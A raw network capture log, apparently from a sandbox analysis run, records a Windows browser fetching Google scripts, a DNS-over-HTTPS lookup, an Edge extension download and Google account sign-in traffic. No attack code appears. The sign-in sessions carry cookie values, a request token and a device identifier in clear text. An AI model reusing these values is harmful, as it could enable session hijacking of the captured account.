2024-07-26 15:57:50 UTC	1390	IN	Data Raw: 75 72 6e 20 61 3d 3d 3d 62 7d 3b 5f 2e 65 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 7b 7d 3b 28 30 2c 5f 2e 4e 61 29 28 61 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 63 5b 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 64 2c 65 2c 61 29 5d 3d 64 7d 29 3b 72 65 74 75 72 6e 20 63 7d 3b 0a 67 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 4f 61 3f 61 28 5f 2e 4f 61 29 3a 66 61 61 2e 70 75 73 68 28 61 29 7d 3b 5f 2e 53 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 5f 2e 4f 61 26 26 5f 2e 51 61 26 26 5f 2e 68 61 61 28 28 30 2c 5f 2e 51 61 29 28 29 29 3b 72 65 74 75 72 6e 20 5f 2e 4f 61 7d 3b 5f 2e 68 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 4f 61 3d 61 3b 66 61 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b Data Ascii: urn a===b};_.eaa=function(a,b){var c={};(0,_.Na)(a,function(d,e){c[b.call(void 0,d,e,a)]=d});return c};gaa=function(a){_.Oa?a(_.Oa):faa.push(a)};_.Sa=function(){!_.Oa&&_.Qa&&_.haa((0,_.Qa)());return _.Oa};_.haa=function(a){_.Oa=a;faa.forEach(function(b){
2024-07-26 15:57:50 UTC	1390	IN	Data Raw: 6e 28 61 29 7b 72 65 74 75 72 6e 7b 76 61 6c 75 65 4f 66 3a 61 7d 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 64 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 60 22 29 3d 3d 3d 2d 31 7d 3b 0a 5f 2e 66 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 65 62 29 72 65 74 75 72 6e 20 61 2e 61 61 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 47 22 29 3b 7d 3b 67 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 70 61 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 61 2b 22 3a 22 7d 29 7d 3b Data Ascii: n(a){return{valueOf:a}.valueOf()};db=function(a){return a.toString().indexOf("`")===-1};_.fb=function(a){if(a instanceof _.eb)return a.aa;throw Error("G");};gb=function(a){return new paa(function(b){return b.substr(0,a.length+1).toLowerCase()===a+":"})};
2024-07-26 15:57:50 UTC	1390	IN	Data Raw: 75 6c 74 56 69 65 77 7c 7c 77 69 6e 64 6f 77 29 3b 62 26 26 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 62 29 7d 3b 5f 2e 41 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 72 63 3d 5f 2e 7a 62 28 62 29 3b 5f 2e 79 62 28 61 29 7d 3b 5f 2e 42 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 69 62 28 62 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 28 61 2e 68 72 65 66 3d 62 29 7d 3b 5f 2e 43 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 69 62 28 62 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 61 2e 72 65 70 6c 61 63 65 28 62 29 7d 3b 0a 5f 2e 44 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 65 61 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 Data Ascii: ultView\|\|window);b&&a.setAttribute("nonce",b)};_.Ab=function(a,b){a.src=_.zb(b);_.yb(a)};_.Bb=function(a,b){b=_.ib(b);b!==void 0&&(a.href=b)};_.Cb=function(a,b){b=_.ib(b);b!==void 0&&a.replace(b)};_.Db=function(){var a=_.ea.navigator;return a&&(a=a.userA
2024-07-26 15:57:50 UTC	1390	IN	Data Raw: 22 37 2e 30 22 29 69 66 28 62 26 26 62 5b 31 5d 29 73 77 69 74 63 68 28 62 5b 31 5d 29 7b 63 61 73 65 20 22 34 2e 30 22 3a 61 3d 22 38 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 35 2e 30 22 3a 61 3d 22 39 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 36 2e 30 22 3a 61 3d 22 31 30 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 37 2e 30 22 3a 61 3d 22 31 31 2e 30 22 7d 65 6c 73 65 20 61 3d 22 37 2e 30 22 3b 65 6c 73 65 20 61 3d 63 5b 31 5d 3b 62 3d 61 7d 65 6c 73 65 20 62 3d 22 22 3b 72 65 74 75 72 6e 20 62 7d 76 61 72 20 64 3d 52 65 67 45 78 70 28 22 28 5b 41 2d 5a 5d 5b 5c 5c 77 20 5d 2b 29 2f 28 5b 5e 5c 5c 73 5d 2b 29 5c 5c 73 2a 28 3f 3a 5c 5c 28 28 2e 2a 3f 29 5c 5c 29 29 3f 22 2c 22 67 22 29 3b 63 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 65 3b 65 Data Ascii: "7.0")if(b&&b[1])switch(b[1]){case "4.0":a="8.0";break;case "5.0":a="9.0";break;case "6.0":a="10.0";break;case "7.0":a="11.0"}else a="7.0";else a=c[1];b=a}else b="";return b}var d=RegExp("([A-Z][\\w ]+)/([^\\s]+)\\s(?:\$(.?)\$)?","g");c=[];for(var e;e
2024-07-26 15:57:50 UTC	1390	IN	Data Raw: 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 43 68 72 6f 6d 65 20 4f 53 22 3a 5f 2e 4b 62 28 22 43 72 4f 53 22 29 7d 3b 57 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4e 22 29 3b 7d 3b 47 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 62 29 3b 72 65 74 75 72 6e 20 61 3d 3d 6e 75 6c 6c 3f 62 3a 61 2b 62 7d 3b 0a 49 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 48 61 61 29 72 65 74 75 72 6e 20 5f 2e 58 62 28 61 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 30 2c 64 3d 61 2e 6c 65 6e 67 74 68 2d 31 30 32 34 30 3b 63 3c 64 3b 29 62 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 Data Ascii: .platform==="Chrome OS":_.Kb("CrOS")};Wb=function(){throw Error("N");};Gaa=function(a,b){b=String.fromCharCode.apply(null,b);return a==null?b:a+b};Iaa=function(a){if(!Haa)return _.Xb(a);for(var b="",c=0,d=a.length-10240;c<d;)b+=String.fromCharCode.apply(
2024-07-26 15:57:50 UTC	1390	IN	Data Raw: 20 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 29 61 3d 61 3f 6e 65 77 20 5f 2e 6a 63 28 61 2c 5f 2e 6b 63 29 3a 5f 2e 69 63 28 29 3b 65 6c 73 65 20 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 5f 2e 6a 63 29 69 66 28 5f 2e 5a 62 28 61 29 29 61 3d 61 2e 6c 65 6e 67 74 68 3f 6e 65 77 20 5f 2e 6a 63 28 64 3f 61 3a 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 61 29 2c 5f 2e 6b 63 29 3a 5f 2e 69 63 28 29 3b 65 6c 73 65 7b 69 66 28 21 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 61 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 57 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 21 61 26 26 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 61 2e 69 6e 63 6c 75 64 65 73 28 62 29 3a Data Ascii: if(typeof a==="string")a=a?new _.jc(a,_.kc):_.ic();else if(a.constructor!==_.jc)if(_.Zb(a))a=a.length?new _.jc(d?a:new Uint8Array(a),_.kc):_.ic();else{if(!b)throw Error();a=void 0}return a};_.Waa=function(a,b){return!!a&&(Array.isArray(a)?a.includes(b):
2024-07-26 15:57:50 UTC	1390	IN	Data Raw: 29 3b 69 66 28 64 29 7b 74 3d 6c 3b 76 3d 67 3b 7a 3d 72 3b 78 3d 70 3b 66 6f 72 28 76 61 72 20 48 20 69 6e 20 64 29 64 3d 2b 48 2c 69 73 4e 61 4e 28 64 29 7c 7c 0a 64 3e 3d 31 30 32 34 7c 7c 28 74 2d 2d 2c 78 2b 2b 2c 7a 2d 3d 48 2e 6c 65 6e 67 74 68 2c 67 3d 65 28 64 2c 78 29 2b 66 28 74 2c 76 2c 7a 29 2c 67 3c 71 26 26 28 61 3d 31 2b 64 2c 71 3d 67 29 29 7d 72 65 74 75 72 6e 20 61 7d 3b 6a 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 63 2b 61 2a 33 2b 28 61 3e 31 3f 61 2d 31 3a 30 29 7d 3b 69 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 28 61 3e 31 3f 61 2d 31 3a 30 29 2b 28 61 2d 62 29 2a 34 7d 3b 67 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 30 3f 30 3a 39 Data Ascii: );if(d){t=l;v=g;z=r;x=p;for(var H in d)d=+H,isNaN(d)\|\|d>=1024\|\|(t--,x++,z-=H.length,g=e(d,x)+f(t,v,z),g<q&&(a=1+d,q=g))}return a};jba=function(a,b,c){return c+a3+(a>1?a-1:0)};iba=function(a,b){return(a>1?a-1:0)+(a-b)4};gba=function(a,b){return a==0?0:9

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	61343	172.64.41.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:51 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-07-26 15:57:51 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-07-26 15:57:51 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 26 Jul 2024 15:57:51 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8a95967c3943c32f-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 15:57:51 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1d 00 04 ac d9 a5 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.5	61416	152.195.19.97	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:57 UTC	614	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722614268&P2=404&P3=2&P4=aDBJmBRiu4bBgG0d5CtBgiCyasWY4s3e85vX9uilaJ5ZoJGUCP2ypk%2bTuDQrDjSoZ5e0N2ocgIZWMEShUpNIng%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: 1nTulnp8J4hLpQqiZr1rmM Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 15:57:57 UTC	632	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Age: 1936008 Cache-Control: public, max-age=17280000 Content-Type: application/x-chrome-extension Date: Fri, 26 Jul 2024 15:57:57 GMT Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31 MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0 MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4 Server: ECAcc (nyd/D11E) X-AspNet-Version: 4.0.30319 X-AspNetMvc-Version: 5.3 X-Cache: HIT X-CCC: US X-CID: 11 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Connection: close
2024-07-26 15:57:57 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.5	61430	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:59 UTC	1401	OUT	GET /_/bscframe HTTP/1.1 Host: accounts.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmation X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
2024-07-26 15:57:59 UTC	1313	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:59 GMT Content-Security-Policy: script-src 'unsafe-eval';require-trusted-types-for 'script';object-src 'none' Strict-Transport-Security: max-age=31536000; includeSubDomains Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Resource-Policy: same-site Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInSignUpUi" Report-To: {"group":"AccountsSignInSignUpUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInSignUpUi"}]} Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-26 15:57:59 UTC	20	IN	Data Raw: 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a Data Ascii: f<!DOCTYPE html>
2024-07-26 15:57:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.5	61432	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:59 UTC	1768	OUT	POST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-4983035178766875362&bl=boq_identityfrontendauthuiserver_20240723.00_p0&hl=en&_reqid=43078&rt=c HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 166 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" x-goog-ext-278367001-jspb: ["GlifWebSignIn"] X-Same-Domain: 1 x-goog-ext-391502476-jspb: ["S-1609852158:1722009468052145","youtube",null,"AdF4I76l5PHSkuJEfmntRfpXyKF9d2CZ3ZVNDVHTO0EGAn7_bo5ZGw98nP2MHND84A-DOFk_AEPt"] sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" Content-Type: application/x-www-form-urlencoded;charset=UTF-8 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmation Origin: https://accounts.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
2024-07-26 15:57:59 UTC	166	OUT	Data Raw: 66 2e 72 65 71 3d 25 35 42 25 35 42 25 35 42 25 32 32 55 45 6b 4b 77 62 25 32 32 25 32 43 25 32 32 25 35 42 25 35 43 25 32 32 53 2d 31 36 30 39 38 35 32 31 35 38 25 33 41 31 37 32 32 30 30 39 34 36 38 30 35 32 31 34 35 25 35 43 25 32 32 25 35 44 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 25 32 32 67 65 6e 65 72 69 63 25 32 32 25 35 44 25 35 44 25 35 44 26 61 74 3d 41 4c 74 34 56 65 33 36 65 51 44 73 65 53 62 54 54 57 66 55 65 34 75 75 32 59 6f 55 25 33 41 31 37 32 32 30 30 39 34 36 38 39 35 32 26 Data Ascii: f.req=%5B%5B%5B%22UEkKwb%22%2C%22%5B%5C%22S-1609852158%3A1722009468052145%5C%22%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at=ALt4Ve36eQDseSbTTWfUe4uu2YoU%3A1722009468952&
2024-07-26 15:57:59 UTC	1601	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Set-Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom; Expires=Sun, 26-Jul-2026 15:57:59 GMT; Path=/; Secure; HttpOnly; Priority=HIGH Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:59 GMT Content-Disposition: attachment; filename="response.bin"; filename=UTF-8''response.bin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi" Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport Cross-Origin-Resource-Policy: same-site Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version= Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-26 15:57:59 UTC	121	IN	Data Raw: 37 33 0d 0a 29 5d 7d 27 0a 0a 31 30 36 0a 5b 5b 22 77 72 62 2e 66 72 22 2c 22 55 45 6b 4b 77 62 22 2c 22 5b 32 5d 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 67 65 6e 65 72 69 63 22 5d 2c 5b 22 64 69 22 2c 32 36 5d 2c 5b 22 61 66 2e 68 74 74 70 72 6d 22 2c 32 36 2c 22 37 34 31 30 31 35 39 36 37 35 33 37 34 35 31 34 39 34 36 22 2c 38 32 5d 5d 0a 0d 0a Data Ascii: 73)]}'106[["wrb.fr","UEkKwb","[2]",null,null,null,"generic"],["di",26],["af.httprm",26,"7410159675374514946",82]]
2024-07-26 15:57:59 UTC	33	IN	Data Raw: 31 62 0d 0a 32 35 0a 5b 5b 22 65 22 2c 34 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 34 32 5d 5d 0a 0d 0a Data Ascii: 1b25[["e",4,null,null,142]]
2024-07-26 15:57:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.5	61448	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:00 UTC	1307	OUT	GET /generate_204?2GXXiw HTTP/1.1 Host: accounts.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmation X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
2024-07-26 15:58:01 UTC	203	IN	HTTP/1.1 204 No Content Content-Length: 0 Cross-Origin-Resource-Policy: cross-origin Date: Fri, 26 Jul 2024 15:58:01 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.5	61449	172.217.23.110	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:00 UTC	549	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
